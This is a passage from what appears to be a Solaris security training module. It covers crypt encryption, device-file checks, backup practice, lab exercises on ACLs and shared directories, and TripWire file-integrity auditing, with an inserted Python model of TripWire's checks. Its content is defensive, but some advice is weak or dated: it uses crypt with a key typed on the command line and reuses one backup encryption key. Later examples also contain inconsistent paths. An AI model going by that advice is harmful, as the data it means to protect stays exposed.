However, there is one last line of defense that can prevent intruders from viewing sensitive information: encryption. There are many different types of encryption with widely varying levels of security. The subject of code making and code breaking is vast, and this module covers only a few aspects.


The crypt Command

The crypt command is a utility for encrypting data. This utility is supplied on every UNIX machine. The command uses a symmetric key (a password or phrase) as input to an encryption algorithm, which encrypts a file into a coded form. The same password or phrase decrypts the file back to its original form.

For example, you are asked to help protect a list containing salary data of company employees. Your own salary data is included on this list. The chief financial officer wants to store this file on a local system and wants to keep it secret, even from you. You can recommend the use of the crypt command because the chief financial officer does not have to reveal the key to you, and encryption provides a level of security that prevents casual access to the data.

To encrypt a file named salaries using the crypt command and the password swordfish, enter:

$ crypt swordfish < salaries > salaries.encrypted


You should delete the original plain text file named salaries immediately after this command and clear the screen so that the password cannot be read by a passerby. The file salaries.encrypted is now in an unreadable format.

To restore the encrypted file to its readable format, repeat the crypt command using the swordfish key, redirecting input from the encrypted file and redirecting standard output to a new file. In this example, the unencrypted file is new_salaries.

$ crypt swordfish < salaries.encrypted > new_salaries

If the key is not supplied, the crypt utility prompts for it. In this case, the key is not echoed to the screen, making it difficult for an onlooker to obtain the key by shoulder surfing. Unfortunately, there is no key confirmation, so if you mistype the key you cannot decrypt the file.

Caution – If you use the C shell or Korn shell and supply the password to crypt on the command line, make sure your command history file is readable only by you (that is, its permissions are set to 600).

The crypt utility uses an encryption algorithm that is widely known and, as such, provides minimal security. The longer the key is, the more difficult it is to break the code of the file. You can reduce the chances of your encrypted files being decrypted by encrypting the file multiple times, using a different key at each stage, and by compressing the files before encrypting them.

Caution – Take special care when decrypting files following the detection of a break-in. A common intruder technique is to deliberately make the system administrator aware of a break-in, and then monitor the administrator during attempts to decrypt files, thereby obtaining the decryption passwords. Following a break-in, be very sure that you are not being monitored as you go through the decryption process.


Securing Device Files

The UNIX implementation of device files is one of the features that makes UNIX so flexible. Unfortunately, device files also present a security hazard when an intruder can access them in an unauthorized way.

For example, if intruders can write to the /dev/kmem file, they can alter process attributes or write garbage data into memory and crash the system. With access to raw disks, an intruder can read sensitive data or even replace or destroy important files.

All standard devices are located in the /devices directory, with symbolic links to them in the /dev directory. A few devices, such as /dev/null and terminal devices, should be world-writable, but most of the rest should not. Regularly check the permissions on the files in /devices and investigate any devices that are world-writable.


Unauthorized Device Files

Regularly check the entire file system for device files planted by intruders. A common method for attacking a system is to create a writable device file in a hidden directory. The ncheck command mentioned earlier (see “Identifying and Changing SUID and SGID Bits” on page 8-22) prints the names of all device files when run with the -s option. Alternatively, use the find command to find all character and block special device files:

# find / \( -type c -o -type b \) -ls


Guidelines for Protecting Systems Using Backups

The importance of doing regular backups is repeated at virtually every level of system administration training, yet stories about the catastrophic loss of important data are still common. Even with the vast improvement in hardware reliability, it is impossible to over-emphasize the importance of performing regular backups and of testing the restoration of the saved data.

You should already know the mechanics of saving and restoring backup data. However, with regard to the topic of system security, the subject is worth revisiting.

When faced with intruder break-ins or the possibility of sensitive data being stolen, administrators should consider some of the finer points of their backup and restore procedures.


A good backup strategy usually involves a combination of full and incremental backups. When making adjustments to a strategy, favor the full backup, because restoring a complete system is easier than restoring an incomplete one. Also, tape and other removable media are cheap compared to the loss of data.

Some of the backup procedures to follow are:

● Use at least two complete sets of media for backups. If using tape, retire a set of tapes after 50 cycles of use because of media degradation.

● Once a week, schedule a time to test your backups by restoring randomly selected files. Choose files of varied sizes and positions on the media to ensure that file size limitations or file boundary problems are not present in your existing backups.

● At least once a year, carry out a complete system restoration on a separate machine, and examine its integrity. Knowing that the prescribed procedures work as intended will do wonders for your confidence level.

● When using tape media, occasionally restore selected files using a different tape drive. Alignment or speed differences could make your drive unique, rendering your tapes useless if that particular tape drive fails.

● Keep the backup media far away from the system being backed up. A local disaster, such as a small fire in one or two rooms, could mean complete loss of data by destroying both the system and the backup. Do not store all the media in the same location.

● Write-protect every tape following a backup. It might be difficult to set the switch to writable again the next time you use the tape, but this difficulty is better than accidentally overwriting a badly needed complete set of data just because of a tape mix-up.

● Some organizations, such as financial institutions, are required to be audited for their ability to separate, manage, and restore backup data. Pay close attention to these requirements. They usually complement or override any existing policy.


● Do a complete backup on systems that are installed for the first time or have undergone a security cleanup. Day-zero backups are valuable when it comes to restoring files following a break-in. If it can be determined where a security problem existed in an initial installation, perform the full restoration, fix the problem, and then back up the system again as your new day-zero backup version. This reduces the possibility of accidentally restoring an old, insecure version of the file system in the future.

● Destroy or mark as unsafe all backups taken after there has been a known or suspected break-in. Make a full backup immediately after the system has been cleaned.

● On a monthly, quarterly, or strategic schedule, test the restoration of a complete set of tapes, and move them off-site to a safe place such as a safe-deposit box. For very sensitive data, it might be necessary to notify company officers of the location and date of the media, in case the system administrator is not available. If the place of storage is not a formal safe-deposit box, make sure that the container is fireproof, waterproof, and free from exposure to excessive electromagnetic radiation.

● If you are concerned that sensitive data might be stolen, be aware of who is transporting the backup media to the off-site location, and ensure that the media is kept under lock and key.

● When backing up very sensitive data, such as trade secrets or highly valuable source code, use encryption. Always use the same encryption key and make it known to a trustworthy officer in case of your absence. Consider the use of a key-code-sharing scheme that requires retrieval of portions of the code from several people, so that no single person can restore the files.

● Live backups (ones taken in multiuser mode while users are potentially making changes to the system) give rise to issues with files that change during the backup. These files usually cannot be restored, or are invalid when restored. Try to schedule backups when users are less likely to be modifying data. If possible, perform backups for archive from single-user mode (or, even better, booted from CD-ROM).

Note – Solaris 8 OE includes a new utility, fssnap, which allows administrators to take a point-in-time snapshot of a UFS file system. The fssnap command enables the user to keep the file system mounted and the system in multiuser mode during backups.


● Set aside special file systems for very important and constantly changing files, and back them up separately and more often than the rest of the system.

The key aspects of this long list are:

● Keep backup media secure at all times.

● Do not allow unauthorized access to backup media or drives.

● Verify backups and do regular restorations as part of your media and procedure checks.

● Destroy compromised backups after a break-in.

Remember, backups can be a weak point in your system’s security.


Restoring Data

Backing up is only half the equation. When a full or partial restoration of data is required, be aware of the following potential security implications:

● If a system has been attacked and subsequently cleaned, careless restoration of old files might restore the security problems and undo all your good work.

● If a system has been hardened (see Module 14), take a backup at that point and, if possible, destroy all previous backups.

● Take care that no files belonging to deleted users are restored.

● Never restore over the original files; only restore to a separate location. Delete the existing files and move the required restored files to their final location after the validity of the restoration has been established.

These points might seem extreme, but implementing them helps to protect your data in the event of a break-in or physical disaster.


Exercise: Securing File Systems

In this exercise, you complete the following tasks:

● Set up an ACL to share files

● Set up a group-shared directory

● Write a shell script that checks for lax file permissions

Preparation

No preparation is required for this exercise.

Tasks

You are not required to finish all of the tasks in the time allocated by the instructor.

Task – Creating ACLs

Create an Access Control List for a file and test it as follows:

1. Create a file (in any manner you want) and set the standard UNIX permissions to read–write for the owner only. Make sure you create the file on a UFS file system such as in a user’s home directory. Do not use the /tmp directory because this is usually a swapfs file system and does not support ACLs.

2. Using an ACL, give read–write access to user alice, and read-only access to user bob.

3. Log in as users alice, bob, and eve, and check that:

a. The user alice can read and write to the file.

b. The user bob can read but not write to the file.

c. The user eve cannot read or write to the file.


4. Remove alice’s write permission and delete bob from the ACL entry.

5. Check that:

a. The user alice can read but not write to the file.

b. The users bob and eve cannot read or write to the file.

Task – Creating a Group-Shared Directory

Use group permissions to create a shared directory as follows:

1. Create separate groups for each of the two users alice and bob.

2. Set the group name to be the same as the user name.

3. Create a third group called admin if this does not already exist.

4. Change alice so that alice’s primary group is alice and also place alice in the admin group. Also change bob to have a primary group of bob and a secondary group of admin.

5. Ensure both users have a umask setting of 027 (either set this manually or ensure it is in /etc/profile or another suitable login profile file).

6. As user alice, create a shared directory called work in alice’s home directory. Ensure this directory can be shared by members of the admin group but do not yet set the SGID bit for this directory.

7. As alice, create a file in this directory and as bob create another file in the directory. Can alice read all files in the shared directory? Can bob read all files?

8. Set the SGID bit for this directory and get alice and bob to create two more files. Can both users read these files?

9. As bob, try to delete the first file alice created. Did this work?

10. As alice, set the sticky bit on the directory and as bob try to delete the second file alice created. Did this work?

11. Can alice delete all the files in the work directory, including those owned by bob?


Task – Creating File System Hardening Checklist

Create a shell script that checks for file system permission violations or other file system security holes. Include any checks that you feel are important.


Exercise Summary


Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications


Exercise Solutions

The following tasks ask you to exercise the knowledge of access control lists and file or directory permissions that you gained in this module.

Creating ACLs

Create a file (in any manner you want) and set the standard UNIX permissions to read–write for the owner only. Make sure you create the file on a UFS file system such as in a user’s home directory. Do not use the /tmp directory because this is usually a swapfs file system and does not support ACLs.

1. The code below shows the acl_file before an ACL entry has been created.

$ echo "a small file" > acl_file
$ chmod 600 acl_file
$ ls -l acl_file
-rw-------   1 groucho  other         13 May  8 14:24 acl_file
$ getfacl acl_file
# file: acl_file
# owner: groucho
# group: other
user::rw-
group::---              #effective:---
mask:---
other:---

2. Use the setfacl -m command to create ACL entries for the file (do not forget to set the mask bits):

$ setfacl -m user:alice:rw-,user:bob:r--,mask:rw- acl_file

or

$ setfacl -r -m user:alice:rw-,user:bob:r-- acl_file
$ ls -l acl_file
-rw-------+  1 groucho  other         13 May  8 14:35 acl_file
$ getfacl acl_file
# file: acl_file
# owner: groucho
# group: other
user::rw-
user:alice:rw-          #effective:rw-
user:bob:r--            #effective:r--
group::---              #effective:---
mask:rw-
other:---

4. Use the setfacl -m command to modify the ACL for alice:

$ setfacl -m user:alice:r-- acl_file
$ getfacl acl_file
# file: acl_file
# owner: groucho
# group: other
user::rw-
user:alice:r--          #effective:r--
user:bob:r--            #effective:r--
group::---              #effective:---
mask:rw-
other:---

a. Alternatively, change the mask so that no one listed in the ACL can write to the file:

$ setfacl -m mask:r-- acl_file
$ getfacl acl_file
# file: acl_file
# owner: groucho
# group: other
user::rw-
user:alice:rw-          #effective:r--
user:bob:r--            #effective:r--
group::---              #effective:---
mask:r--
other:---

b. Use the setfacl -d command to remove the ACL entry for bob:

$ setfacl -d user:bob acl_file
$ getfacl acl_file
# file: acl_file
# owner: groucho
# group: other
user::rw-
user:alice:r--          #effective:r--
group::---              #effective:---
mask:rw-
other:---

c. Alternatively, use the setfacl -m command to remove bob’s read permission:

$ setfacl -m user:bob:--- acl_file
$ getfacl acl_file
# file: acl_file
# owner: groucho
# group: other
user::rw-
user:alice:r--          #effective:r--
user:bob:---            #effective:---
group::---              #effective:---
mask:rw-
other:---

d. Or remove bob’s permissions with:

$ setfacl -d u:bob acl_file
$ getfacl acl_file
# file: acl_file
# owner: groucho
# group: other
user::rw-
user:alice:r--          #effective:r--
group::---              #effective:---
mask:rw-
other:---

Creating a Group-Shared Directory

1. Create separate groups for each of the two users alice and bob.

2. Set the group name to be the same as the user name.

3. Create a third group called admin if this does not already exist.

4. Change alice so that the primary group is alice and the user is in the admin group. Also change bob to have a primary group of bob and a secondary group of admin.

# groupadd alice
# groupadd bob
# groupadd admin
# usermod -g alice -G admin alice
# usermod -g bob -G admin bob

5. Ensure that both users have a umask setting of 027 (either set this manually or ensure it is in the /etc/profile file or another suitable login profile file).

alice$ umask 027

bob$ umask 027


6. As user alice, create a shared directory called work in alice’s home directory. Ensure that this directory can be shared by members of the admin group but do not yet set the set-group-id bit for this directory.

alice$ mkdir work
alice$ chgrp admin work
alice$ chmod g+w work

7. As alice, create a file in this directory and as bob try to create another file in the directory.

alice$ touch work/alice1

bob$ touch ~alice/work/bob1

alice$ ls -ld work work/*
drwxrwx---   2 alice    admin        512 Jul  5 16:57 work
-rw-r-----   1 alice    alice          0 Jul  5 16:57 work/alice1
-rw-r-----   1 bob      bob            0 Jul  5 16:57 work/bob1

Can alice read all files in the shared directory?

No, alice cannot read bob’s file because alice is neither its owner nor a member of its group.

Can bob read all files?

No, bob cannot read alice’s file because bob is neither its owner nor a member of its group.

8. Set the set-group-id bit for this directory and get alice and bob to create two more files.

alice$ chmod g+s work
alice$ touch work/alice2

bob$ touch ~alice/work/bob2

alice$ ls -ld work work/*
drwxrws---   2 alice    admin        512 Jul  5 17:03 work
-rw-r-----   1 alice    alice          0 Jul  5 16:57 work/alice1
-rw-r-----   1 alice    admin          0 Jul  5 17:03 work/alice2
-rw-r-----   1 bob      bob            0 Jul  5 16:57 work/bob1
-rw-r-----   1 bob      admin          0 Jul  5 17:03 work/bob2


Can both users read these files?

Yes, both alice and bob can read the two new files because they arein the same group as the file.

9. As bob , try to delete the first file that alice created.

bob$ rm ~alice/work/alice1rm: /export.home/alice/work/alice1: override protection 640 (yes/no)? y

Did this work?

Yes it did because bob has write permission to the directory. The rmwarning was issued because bob does not have write permission to thefile, but this does not affect the ability to delete the file.

10. As alice, set the sticky bit on the directory and as bob try to delete the second file alice created.

alice$ chmod +t work
alice$ ls -ld work work/*
drwxrws--T   2 alice    admin        512 Jul  5 17:05 work
-rw-r-----   1 alice    admin          0 Jul  5 17:03 work/alice2
-rw-r-----   1 bob      bob            0 Jul  5 16:57 work/bob1
-rw-r-----   1 bob      admin          0 Jul  5 17:03 work/bob2

bob$ rm ~alice/work/alice2
rm: /export.home/alice/work/alice2: override protection 640 (yes/no)? y
rm: alice2 not removed: Permission denied

Did this work?

No, the sticky bit prevents bob from deleting files that bob does not own.

11. Can alice delete all the files in the work directory, including those owned by bob?

Yes, alice can because alice owns the directory.


Creating a File System Hardening Checklist

The following is an example script. You might have thought of extra checks.

# find files in bin and system directories that are world-writable
find /usr/sbin /usr/bin /etc /var -perm -o=w -type f -exec ls -l {} \;

# find root-owned SUID files and compare with the valid list
find / -perm -u=s -user root -type f -exec ls -l {} \; > /tmp/suid
diff /tmp/suid /var/security/valid_suid_root

# find any SUID or SGID files and compare with the valid list
find / \( -perm -u=s -o -perm -g=s \) -type f -exec ls -l {} \; > /tmp/sgid
diff /tmp/sgid /var/security/valid_suid_sgid

# find any files not owned by a valid user
find / -nouser -print

# find device files outside the /devices, /dev and /proc directories
find / -name devices -prune -o -name dev -prune -o -name proc -prune -o \( -type c -o -type b \) -print


Module 9

Auditing File Systems

Objectives

Upon completion of this module, you should be able to:

● Describe the role of file system auditing

● Describe how file system auditing tools such as TripWire can secure your system

● Describe the purpose of the Solaris OE Fingerprint Database


Relevance


Discussion – The Solaris OE contains many applications and important system files. Can you:

● Be sure that files integral to the security of your system have not been tampered with?

● Quickly verify that your important files were left untouched after a system break-in?


Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

● Online manual pages for tripwire(8) and tw.config(5).

● The Solaris OE Fingerprint Database [http://sunsolve.sun.com/pub-cgi/fileFingerprints.pl]

● The Solaris OE md5 program [http://sunsolve.sun.com/md5/md5.tar.Z]

● The TripWire tool download site: [ftp://ftp.cerias.purdue.edu/pub/tools/unix/ids/tripwire/Tripwire-1.3.1-1.tar.gz]


What Is Auditing?

File system auditing is the process of monitoring the file system for changes, and reporting those changes that are deemed important. A file system audit can look for any change to the file system, such as new or deleted files, a change in file contents, or a change in a file time stamp.


The results of a file system audit can determine:

● Whether a system break-in has occurred, due to the identification of file modifications made by intruders either trying to cover their tracks or installing modified programs

● Whether system files have been tampered with, and whether those files should now be investigated to determine if they can be trusted

● Which files have been modified after a successful system break-in


Auditing Techniques

A file system auditing tool typically creates a database representing the current state of the file system. At some later time, you run the tool again to compare the new state of the file system with the database recorded the first time that the tool was run. You can generate a report describing what has changed. After recording and investigating any changes, the database should be updated with those changes that have been acknowledged.

Auditing tools allow an administrator to specify which parts of the file system to monitor, and how to monitor them. There are many attributes of a file system that can be monitored:

● New and deleted files

● File size

● File contents (using a checksum or signature)

● File owners (user and group)

● The file mode (permissions)


● Time stamps (access, modification, and inode update)

● Inode number (showing that a file has been replaced)

When configured, most file system auditing tools can be automatically executed at regular intervals, and the report emailed to an administrator. However, some manual intervention is required to ensure that the audit tool itself, the configuration files, or the database have not been tampered with.

Another approach to file system auditing is the use of large databases containing file signatures (see “File Digest Algorithms” on page 9-11). With this approach, you use a program to obtain the signature of a file, and then use this signature to query the database. A report is produced on the file, describing whether it is contained in the database. For example, if the database contains all known binary programs in all operating releases from a certain vendor, then the report describes the operating system version and patch level of the file. These databases are extremely useful when acquiring a system with an unknown history, because they allow you to verify whether the files are from an original distribution.


Using Audits to Detect Successful Security Attacks

There are several ways to use a file system auditing tool to detect a successful security attack. The following file system changes might be made by an intruder on your system, and should be investigated:

● A file that should not change has changed (for example, /bin/login has changed due to an intruder installing a modified version)

● A new file has been added to a directory that should not generally change (for example, an intruder has added a network sniffer to /usr/bin)

● A log file has shrunk (an intruder tried to cover their tracks by editing one of the many system logs)

● A new user has been added to the password file (this might not be due to an intruder, but the system administrator should be aware of it)


File Digests and Checksums

File system auditing tools use checksums and file digest algorithms to monitor a file for changes. These values are stored in the audit database, along with other attributes such as file size. There are advantages and disadvantages to both checksums and file digest algorithms; therefore, most tools allow you to choose which to use.


Checksum Algorithms

Checksums are small (16- or 32-bit) values and they are used primarily for monitoring files against casual or random modifications. A determined intruder can modify a file and still keep the size and checksum unchanged. The algorithms, although insecure against a determined intruder, are extremely fast. CRC16 and CRC32 are two examples of modern checksum algorithms.

The UNIX utility sum is a simple checksum algorithm, as shown in Code 9-1.

Code 9-1 Example Checksum Algorithm

# sum /usr/bin/ksh
2940 393 /usr/bin/ksh


File Digest Algorithms

File digest algorithms (sometimes called Message Digest Algorithms, or Cryptographic One-Way Hash Functions) are extremely complex algorithms developed by cryptographers. The file digests (or signatures) generated by these algorithms can be thought of as a small (often around 16 or 20 bytes) representation of a file. Any change results in the corresponding file digest changing as well. When using a good file digest algorithm, an intruder cannot modify a file and leave the file digest value unchanged.

The downside to the good security of file digest algorithms is that they can be very slow compared to checksum algorithms. Message Digest version 5 (MD5) and Secure Hash Algorithm (SHA) are two of the more popular and trusted algorithms.


An MD5 program is not supplied with the Solaris OE but can be downloaded from the Web site shown in “Additional Resources” on page 9-3. Code 9-2 shows an example of the MD5 program in use.

Code 9-2 Example MD5 Algorithm

# md5 /usr/bin/ksh
MD5 (/usr/bin/ksh) = 0c9979ee5d4aabf6f084b21bc6b46b8a


The Solaris OE Fingerprint Database

The Solaris OE Fingerprint Database is a SunSolve℠ service that enables you to verify the integrity of files distributed with the Solaris OE, Solaris OE patches, and unbundled products, such as SPARC™ compilers.

The Solaris OE Fingerprint Database can verify that a customer is using a true file from an official binary distribution, and not a recompiled version that could compromise security, or at least cause support problems. You must enter a file’s MD5 signature to obtain a report on the file. The MD5 program is required to generate the MD5 signature.

The MD5 program and the Solaris OE Fingerprint Database are available from the SunSolve Web site (see “Additional Resources” on page 9-3 for the URL).


Example output for the MD5 signature of /usr/bin/ksh from Code 9-2 on page 9-12 is shown in Figure 9-1.

Figure 9-1 Solaris Fingerprint Database


Using TripWire to Audit File Systems

TripWire is a freeware file system auditing tool that creates a database of information about files on a file system. This database is later compared with the current file system to determine what has changed, which provides a way of determining which files have been modified. You can then update the database with the new changes, after the changes have been investigated.


One way to use the TripWire tool is to initialize the database, store a secure copy offsite, and then use the TripWire tool from a cron job to regularly audit the file system. If there are changes, TripWire notifies you using email.

When the TripWire tool reports a change to a file’s contents, it notifies you that a change has occurred, but does not give information about what the change is. You should completely reinstall corrupted files instead of trying to fix them.

Note – The TripWire tool was developed by Eugene Spafford and Gene Kim at Purdue University in 1992. TripWire was commercialized in 1998 and is maintained by TripWire Security, Inc.

Obtaining the TripWire Tool

The TripWire tool can be obtained from the FTP site listed in “Additional Resources” on page 9-3.


Editing the TripWire Configuration File

You must edit the tw.config default configuration file to fit the requirements of the system. This file is kept in the TripWire configuration directory, which is determined when TripWire is built and installed. By default this is /usr/local/bin/tw.

TripWire includes many default configurations for most popular UNIX platforms in the configs subdirectory of the TripWire installation directory. Typically, you copy a standard configuration to your tw.config file, remove all directories and files that are of no interest, and add any additional files and directories that are important.

Each line in this file contains a file (or directory) path name and a string of characters representing the attributes to monitor.


The characters in the tw.config file indicate to TripWire which attributes to check. A full list of attributes is shown in Table 9-1.

Table 9-1 TripWire Attribute Characters

Attribute  Meaning
p          Permission and file mode bits
i          Inode number
n          Number of links (that is, the inode reference count)
u          User ID of owner
g          Group ID of owner
s          Size of file
a          Access time stamp
m          Modification time stamp
c          Inode creation or modification time stamp
0          Null signature
1          MD5, the RSA Data Security, Inc.® Message Digesting Algorithm
2          Snefru, the Xerox Secure Hash Function
3          CRC-32, POSIX 1003.2 compliant 32-bit Cyclic Redundancy Check
4          CRC-16, the standard (non-CCITT) 16-bit Cyclic Redundancy Check
5          MD4, the RSA Data Security, Inc. Message Digesting Algorithm
6          MD2, the RSA Data Security, Inc. Message Digesting Algorithm
7          SHA, the NIST Secure Hash Algorithm (NIST FIPS 180)
8          Haval, a strong 128-bit signature algorithm
9          Null signature (reserved for future expansion)


If a character is prefixed with a + (for example, +pugs1m for /fred), those respective attributes are used when checking a file. Attributes prefixed with a - are not checked.


Configuration Templates

Using the character codes to specify the audit attributes for files and directories can be tedious and prone to error. The TripWire tool contains templates that can import a set of attributes. Table 9-2 shows the templates that are defined.

By default, TripWire uses the R template, which ignores only the access time stamp.

Table 9-2 TripWire Configuration Templates

Template  Description       Attributes
R         Read-only         +pinugsm012-a3456789
L         Log file          +pinug-samc0123456789
>         Growing log file  +pinug-samc0123456789
N         Nothing           -pinugsamc0123456789
E         Everything        +pinugsamc0123456789


You can use the templates in a modified manner by appending additional characters. For example, use the sequence L+c-p for a log file where the inode creation and modification time (c) should be monitored, but the permissions (p) can be ignored.

The only difference between the log file template (L) and the growing log file template (>) is that the growing log file template is the only template that ignores increases in file size (the > attribute). However, it still checks that the file does not decrease in size.

A tw.config file is shown in Code 9-3.

Code 9-3 Simple TripWire Configuration

# more tw.config
/etc/passwd        +pugs1m-a
/etc/shadow        +pugs1m-a
/usr/sbin          +pugs1m-a
/usr/bin           +pugs1m-a
/var/log/messages  >

Go to the online manual page for tw.config(5) for information about additional switches and templates, where switches can be grouped together.
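The snapshot-and-compare cycle described under “Auditing Techniques”, the attribute letters of Table 9-1 and the templates of Table 9-2 are worked through below in a small Python model written for this section; it is not TripWire’s code, and the function names (parse_attrs, parse_config, snapshot, initialize, check, run_scenario) are this example’s own. It computes digest codes 1, 3 and 7 with MD5, CRC-32 and SHA-1 from the Python standard library, applies the growing-log rule as the page describes it for the > template, and run_scenario() works on constructed sample files in a temporary directory.

```python
import hashlib
import os
import shutil
import tempfile
import zlib

TEMPLATES = {  # Table 9-2 as printed on the page; > is additionally flagged as growing
    "R": "+pinugsm012-a3456789", "L": "+pinug-samc0123456789",
    ">": "+pinug-samc0123456789", "N": "-pinugsamc0123456789",
    "E": "+pinugsamc0123456789",
}

def parse_attrs(spec):
    """'+pugs1m-a' or 'L+c-p' -> (set of letters to check, growing-log flag)."""
    growing = spec.startswith(">")
    if spec[0] in TEMPLATES:       # expand the template, then apply the +/- overrides
        spec = TEMPLATES[spec[0]] + spec[1:]
    checked, sign = set(), "+"
    for ch in spec:
        if ch in "+-":
            sign = ch
        else:
            (checked.add if sign == "+" else checked.discard)(ch)
    if growing:                    # a growing log may only get bigger: size is still compared
        checked.add("s")
    return checked, growing

def parse_config(text):
    """tw.config lines are 'path attributes'; '#' comments and blank lines are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            path, spec = line.split(None, 1)
            rules.append((path, *parse_attrs(spec)))
    return rules

def expand(rules):
    """Every monitored path -> (checked letters, growing flag); directories are walked."""
    entries = {}
    for path, checked, growing in rules:
        entries[path] = (checked, growing)
        for root, dirs, files in os.walk(path):
            for name in dirs + files:
                entries[os.path.join(root, name)] = (checked, growing)
    return entries

def snapshot(path, checked):
    """Record the checked attributes of one path, keyed by the Table 9-1 letters."""
    st = os.lstat(path)
    rec = {"p": st.st_mode, "i": st.st_ino, "n": st.st_nlink, "u": st.st_uid, "g": st.st_gid,
           "s": st.st_size, "a": st.st_atime, "m": st.st_mtime, "c": st.st_ctime}
    if os.path.isfile(path) and checked & set("137"):
        with open(path, "rb") as f:
            data = f.read()
        rec["1"], rec["3"] = hashlib.md5(data).hexdigest(), zlib.crc32(data)
        rec["7"] = hashlib.sha1(data).hexdigest()
    return {k: v for k, v in rec.items() if k in checked}

def initialize(rules):
    """tripwire -initialize (Phase 3): build the file information database."""
    return {p: snapshot(p, c) for p, (c, _) in expand(rules).items() if os.path.lexists(p)}

def check(rules, db):
    """tripwire (Phase 4): compare the file system with the database; returns
    (added, deleted, changed) where changed maps path -> {attr: (observed, expected)}."""
    current = expand(rules)
    now = {p: snapshot(p, c) for p, (c, _) in current.items() if os.path.lexists(p)}
    changed = {}
    for p in set(now) & set(db):
        diffs = {}
        for attr, expected in db[p].items():
            observed = now[p].get(attr)
            grew = current[p][1] and attr == "s" and observed is not None and observed > expected
            if observed != expected and not grew:  # a grown log is sanctioned by >, a shrunk one is not
                diffs[attr] = (observed, expected)
        if diffs:
            changed[p] = diffs
    return sorted(set(now) - set(db)), sorted(set(db) - set(now)), changed

def run_scenario():
    """Constructed sample data: a program altered without changing its size, a file
    added to a static directory, a log that grows (sanctioned) and later shrinks."""
    base = tempfile.mkdtemp(prefix="tw_demo_")
    def write(name, text):
        path = os.path.join(base, name)
        with open(path, "w") as f:
            f.write(text)
        return path
    try:
        os.mkdir(os.path.join(base, "bin"))
        ksh, log = write("bin/ksh", "#!/bin/sh\necho original\n"), write("messages", "line1\n")
        rules = parse_config(f"{base}/bin +pugs1m-a\n{log} >\n")
        db = initialize(rules)
        write("messages", "line1\nline2\n")             # sanctioned growth
        write("bin/ksh", "#!/bin/sh\necho modified\n")  # same size, different contents
        new = write("bin/newtool", "x")                  # unexpected file in a static directory
        first = check(rules, db)
        db = initialize(rules)                           # -update once the changes were investigated
        write("messages", "line2\n")                     # shrunk log: still a violation under >
        second = check(rules, db)
    finally:
        shutil.rmtree(base)
    return {"first": first, "second": second, "ksh": ksh, "log": log, "new": new}
```

In the first check the altered program is caught by its MD5 (attribute 1) even though its size is unchanged, the new file is reported as added and the grown log is silent; after the update, the shrunk log is reported through its size attribute.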

Generating a TripWire Database

You can create a new TripWire database by running TripWire with the -initialize argument. If you also provide the verbose flag (the -v argument), then each file name and directory appears as it is scanned, as shown in Code 9-4.

Code 9-4 Creating a New TripWire Database

# tripwire -initialize
Tripwire(tm) ASR (Academic Source Release) 1.3.1
File Integrity Assessment Software
(c) 1992, Purdue Research Foundation, (c) 1997, 1999 Tripwire
Security Systems, Inc. All Rights Reserved. Use Restricted to
Authorized Licensees.
### Phase 1: Reading configuration file
### Phase 2: Generating file list
### Phase 3: Creating file information database
###


### Warning: Database file placed in ./databases/tw.db_grommit.
###
### Make sure to move this file and the configuration
### to secure media!
###
### (Tripwire expects to find it in '/var/tripwire'.)


Checking a TripWire Database

When you generate or initialize the database, you should archive it securely. The TripWire tool can check the integrity of the system by comparing the archived database with the current system.

Copy the TripWire database created in Code 9-4 on page 9-21 to the default TripWire database directory location (/var/tripwire in this example), and run the TripWire tool to determine if any files on the system have changed, as shown in Code 9-5.

Note – The name of the database file depends upon the hostname of the system. These examples use the hostname grommit, and the database file is tw.db_grommit. You must modify the examples to suit your server; check the contents of the databases directory to determine what file name you should use.

Code 9-5 Running TripWire to Identify Changed Files

# cp databases/tw.db_grommit /var/tripwire


# tripwire
### Phase 1: Reading configuration file
### Phase 2: Generating file list
### Phase 3: Creating file information database
### Phase 4: Searching for inconsistencies
###
### All files match Tripwire database. Looks okay!
###

This example indicates that no files were modified.

Identifying Inconsistencies

To show TripWire recognizing an inconsistency, modify one of the files that is being checked, and run TripWire again, as shown in Code 9-6.

Code 9-6 Running TripWire to Identify Inconsistencies

# touch /usr/bin/clear
# tripwire
### Phase 1: Reading configuration file
### Phase 2: Generating file list
### Phase 3: Creating file information database
### Phase 4: Searching for inconsistencies
###
### Total files scanned: 617
### Files added: 0
### Files deleted: 0
### Files changed: 1
###
### Total file violations: 1
###
changed: -r-xr-xr-x root 795 Jul 6 12:28:28 2001 /usr/bin/clear
### Phase 5: Generating observed/expected pairs for changed files
###
### Attr        Observed (what it is)         Expected (what it should be)
### =========== ======================================================
/usr/bin/clear
      st_mtime: Fri Jul  6 12:28:28 2001     Thu Apr 26 17:56:50 2001
      st_ctime: Fri Jul  6 12:28:28 2001     Thu Apr 26 17:56:50 2001


Updating the Database

You can update the database to accommodate sanctioned changes by running the TripWire tool in the update mode, as shown in Code 9-7, where directories or files can be specified.

Code 9-7 Running TripWire in the Update Mode

# tripwire -update /usr/bin/clear
Tripwire(tm) ASR (Academic Source Release) 1.3.1
File Integrity Assessment Software
(c) 1992, Purdue Research Foundation, (c) 1997, 1999 Tripwire
Security Systems, Inc. All Rights Reserved. Use Restricted to
Authorized Licensees.
### Phase 1: Reading configuration file
### Phase 2: Generating file list
Updating: update file: /usr/bin/clear
### Phase 3: Updating file information database
###
### Old database file will be moved to `tw.db_grommit.old'
### in ./databases.
###
### Updated database will be stored in './databases/tw.db_grommit'
### (Tripwire expects it to be moved to '/var/tripwire'.)
###
### Database cleanup started
### Database cleanup finished
# cp ./databases/tw.db_grommit /var/tripwire

Double-Checking Integrity

Copy the database to the default TripWire database directory location (/tmp in this example), and perform another integrity check to determine if the changes to the /fred directory are reported after a database update.

# cp databases/tw.db_grommit /tmp
# tripwire
### Phase 1: Reading configuration file
### Phase 2: Generating file list
### Phase 3: Creating file information database
### Phase 4: Searching for inconsistencies
###
### All files match Tripwire database. Looks okay!
###


For additional information about the TripWire tool, read the README file in the TripWire directory or the tripwire(8) and tw.config(5) manual pages.


Securing the TripWire Database

You should store TripWire databases in a secure manner. For example, use:

● Read-only media

● Removable media

● A trusted secure server

● A copy on a machine that is not connected to a network

The database must be secured in this way to ensure that TripWire reports any changes made to the database (for example, an intruder might perform a TripWire initialize operation after installing modified programs, to try to avoid changes being reported).


